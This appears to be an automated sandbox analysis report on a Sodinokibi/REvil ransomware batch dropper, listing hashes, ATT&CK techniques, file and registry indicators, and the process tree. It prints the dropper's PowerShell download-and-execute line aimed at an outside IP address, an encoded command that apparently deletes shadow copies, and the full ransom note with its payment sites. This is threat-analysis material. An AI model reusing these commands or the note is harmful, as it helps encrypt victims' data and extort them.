sodinokibi | 62059583f678cc07ba6d42a856ff79d0747e13f0d1b2b6e2c75ec316bf47d686

General

Target

9842da71e658da87f135c517a3f7aba2.bat
Size

219B
MD5

5acf7c3e584d3bebc79930940e9cbb00
SHA1

37f0819fd07164c0b419c2947e43fd06a07fc83a
SHA256

62059583f678cc07ba6d42a856ff79d0747e13f0d1b2b6e2c75ec316bf47d686
SHA512

c6cdf567391326815253277475a921f2f454c434324592a63c91a9e08818806e223dcbc41e345debf124611a9df1474829bdbd11057e6120038292774ee5b5b8

Score

10^/10

ransomware persistence sodinokibi

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/9842da71e658da87f135c517a3f7aba2

Extracted

Path

C:\h29785m8-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension h29785m8. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/322534A63754DCD9 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/322534A63754DCD9 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: ewYFmSIji5XkILjp9PH1xyiyqhSv7zMP5hgDAT0ov+wnC/D9WAUbHrPNAHcnYIDH 7LpDNC6iaqoK5Bdd7tlj8L6T0H6vIIM1UPSsKasANcPFyglAPVdHjjKG4xYH7TvR eiP6mqW1w/rVu+aDS9QiUxF5FTz+NholDuBtaocDV6eVqYNJGG6v0fZA1sd2i+OO 7CetBYxX4gbMn2wsVAgGjwoE8ak8Ls28Rby9ZrrbIn892R3oyPZ06V9GnM6ABLnE w2DAZ7eL4PHTp9rRVRpvbUo9MW+GjvNnPBPepAJkGXav46quywrza+vW7CQ3Ygid lysDx/E1yaMiGn66yW5VNzJNaN+ITbM31feDRPzY9ATO6pRDbmIXHDb85zgJoNhJ 9h25MXTbN6+HMA8qCE+UkdDmmeuG7N5Re8Qj3EWXgZXI6xYTPjhT55FcIkifu23m I9vV6GmcuNcDdKI3mVzk3K85wMd7sWuAGkB+GmLb2LKz6t7b7EB5V/t4cHPLsaRL LbKXj9PEZpOuZoGw2CmRXSEKgwIiE2izZfXIqxmxc+jM76G26YBldh1GMs5DncQX orbiWLGrTngPqwrKLaDiPrC/SNZ/7l9SEszwEa0FwklMwB6hiTRqb9tKCGbJ8W2z A2QRAW9nR/W/+U/ZhSoGBdodjUt3pDGx9bjToezwafxbLy75U15RQmMETFqxTL+Z x8Kg+bZ7vW5Tq8+wejvqTvwrPyNw/LPu7Js4nunu29N5YF18MemC0uvhpAPueqR+ jZg5XVY9LG+U+sWBun2OqPpGkZ+2tXvEr5atOB8tFux8JxZwgY49Qtng6mZnbYD4 2NeUhgM+bQF9KE32xmyt+Votgt0TB2SnVwzV5cSgPk9MS+WymCMjHHkQjwJR82dz Z4S2/R7xSc0yc4W1iXR8EyLsnArncR1XLpuPKWQuLj0TbTXsSk6ydZ65eGCSL9by 61veRFHsqqS9dpVzHZZCQslPEdt/PhfRkZzolTD5YM9yQotlVwafnruDaSMYKoZn mfaKENTWzvG+N2eqLDBL3dXDTroyy6IiWiH4YqEV18sarW7zsvvQ3roI0sXy8EG9 ZXTNj2MTNrPjm0TKHWawXxSZkp67E6UC/VGhYg6SaUaI7ZHmmKaf7qA2p1C0pWLa qeRNr6wGqe64XFfqoSI/t04j8j9t1kyQKDPT65IOM3X9em1ph74wI8GWRVT2P0Yb CySAGVK76yB4Pd0245oDM0pQSBrlRAP4TQXGo4FBx1AXMDio6AINUyHLjcsYBMN0 IuDc1H38yQqh27yohD2MOOHXWRDos2lygtiUuUo+k6S7h9Ba ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/322534A63754DCD9

http://decryptor.cc/322534A63754DCD9

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi
Blacklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

3 1416 powershell.exe

flow	pid	process
3	1416	powershell.exe

Modifies extensions of user files 2 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

powershell.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\GetUpdate.png => \??\c:\users\admin\pictures\GetUpdate.png.h29785m8	powershell.exe
File renamed	C:\Users\Admin\Pictures\HideEdit.png => \??\c:\users\admin\pictures\HideEdit.png.h29785m8	powershell.exe

Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\362xmlm6d.bmp"	powershell.exe

Drops file in Program Files directory 29 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	\??\c:\program files\EditUnpublish.cfg	powershell.exe
File opened for modification	\??\c:\program files\PopAssert.ini	powershell.exe
File opened for modification	\??\c:\program files\RegisterSelect.AAC	powershell.exe
File opened for modification	\??\c:\program files\SearchStart.dxf	powershell.exe
File created	\??\c:\program files\h29785m8-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\CheckpointPush.wax	powershell.exe
File opened for modification	\??\c:\program files\DisconnectUndo.dotm	powershell.exe
File opened for modification	\??\c:\program files\EditUnblock.tif	powershell.exe
File opened for modification	\??\c:\program files\SkipProtect.ini	powershell.exe
File opened for modification	\??\c:\program files\UnregisterPop.php	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\desktop\h29785m8-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\ResolveInvoke.tiff	powershell.exe
File opened for modification	\??\c:\program files\ShowCompress.wma	powershell.exe
File opened for modification	\??\c:\program files\UndoGrant.gif	powershell.exe
File opened for modification	\??\c:\program files\DismountInitialize.wps	powershell.exe
File opened for modification	\??\c:\program files\ReadEnter.vbe	powershell.exe
File opened for modification	\??\c:\program files\SplitProtect.mhtml	powershell.exe
File opened for modification	\??\c:\program files\DenyInstall.easmx	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\h29785m8-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\MoveUnpublish.dot	powershell.exe
File opened for modification	\??\c:\program files\ReadConvertTo.DVR-MS	powershell.exe
File opened for modification	\??\c:\program files\UnprotectFind.js	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\h29785m8-readme.txt	powershell.exe
File created	\??\c:\program files (x86)\h29785m8-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\OutPublish.DVR	powershell.exe
File opened for modification	\??\c:\program files\SuspendSubmit.mpeg	powershell.exe
File opened for modification	\??\c:\program files\UnprotectRename.doc	powershell.exe
File opened for modification	\??\c:\program files\ShowGrant.mp4	powershell.exe
File opened for modification	\??\c:\program files\UnlockRestart.otf	powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

powershell.exe

pid process

1416 powershell.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

1416 powershell.exe
1416 powershell.exe
1416 powershell.exe
1368 powershell.exe
1368 powershell.exe

pid	process
1416	powershell.exe

pid	process
1416	powershell.exe
1416	powershell.exe
1416	powershell.exe
1368	powershell.exe
1368	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	1416	powershell.exe
Token: SeDebugPrivilege	1416	powershell.exe
Token: SeDebugPrivilege	1368	powershell.exe
Token: SeBackupPrivilege	568	vssvc.exe
Token: SeRestorePrivilege	568	vssvc.exe
Token: SeAuditPrivilege	568	vssvc.exe
Token: SeTakeOwnershipPrivilege	1416	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 604 wrote to memory of 1416	604	cmd.exe	powershell.exe
PID 604 wrote to memory of 1416	604	cmd.exe	powershell.exe
PID 604 wrote to memory of 1416	604	cmd.exe	powershell.exe
PID 604 wrote to memory of 1416	604	cmd.exe	powershell.exe
PID 1416 wrote to memory of 1368	1416	powershell.exe	powershell.exe
PID 1416 wrote to memory of 1368	1416	powershell.exe	powershell.exe
PID 1416 wrote to memory of 1368	1416	powershell.exe	powershell.exe
PID 1416 wrote to memory of 1368	1416	powershell.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\9842da71e658da87f135c517a3f7aba2.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:604

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/9842da71e658da87f135c517a3f7aba2');Invoke-SBNFPXFVJWUD;Start-Sleep -s 10000"
2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1416

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1368

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:568

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_478c05f3-b801-4912-91bd-47646e127596

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4fd4a7fe-82f5-41e4-888c-1b7eac83ece7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a2ebb337-3027-47ef-8098-8d2e9f7615cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ca37ad88-4ce8-48e7-a2ed-ec10658dba29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e10aa6dc-f3ff-45e4-9eec-4fef42847693

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1dd9aab-0fd1-4532-ba7f-00569c2741ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Download Submit
memory/1368-23-0x0000000000000000-mapping.dmp

Download
memory/1368-25-0x00000000739C0000-0x00000000740AE000-memory.dmp

Filesize
6.9MB

Download
memory/1416-5-0x00000000048A0000-0x00000000048A1000-memory.dmp

Filesize
4KB

Download
memory/1416-22-0x00000000062C0000-0x00000000062C1000-memory.dmp

Filesize
4KB

Download
memory/1416-21-0x00000000061B0000-0x00000000061B1000-memory.dmp

Filesize
4KB

Download
memory/1416-14-0x0000000006220000-0x0000000006221000-memory.dmp

Filesize
4KB

Download
memory/1416-13-0x0000000006080000-0x0000000006081000-memory.dmp

Filesize
4KB

Download
memory/1416-8-0x0000000005FD0000-0x0000000005FD1000-memory.dmp

Filesize
4KB

Download
memory/1416-0-0x0000000000000000-mapping.dmp

Download
memory/1416-4-0x00000000025D0000-0x00000000025D1000-memory.dmp

Filesize
4KB

Download
memory/1416-3-0x0000000004920000-0x0000000004921000-memory.dmp

Filesize
4KB

Download
memory/1416-2-0x0000000000960000-0x0000000000961000-memory.dmp

Filesize
4KB

Download
memory/1416-1-0x00000000739C0000-0x00000000740AE000-memory.dmp

Filesize
6.9MB

Download
memory/1416-38-0x0000000009170000-0x00000000094F5000-memory.dmp

Filesize
3.5MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads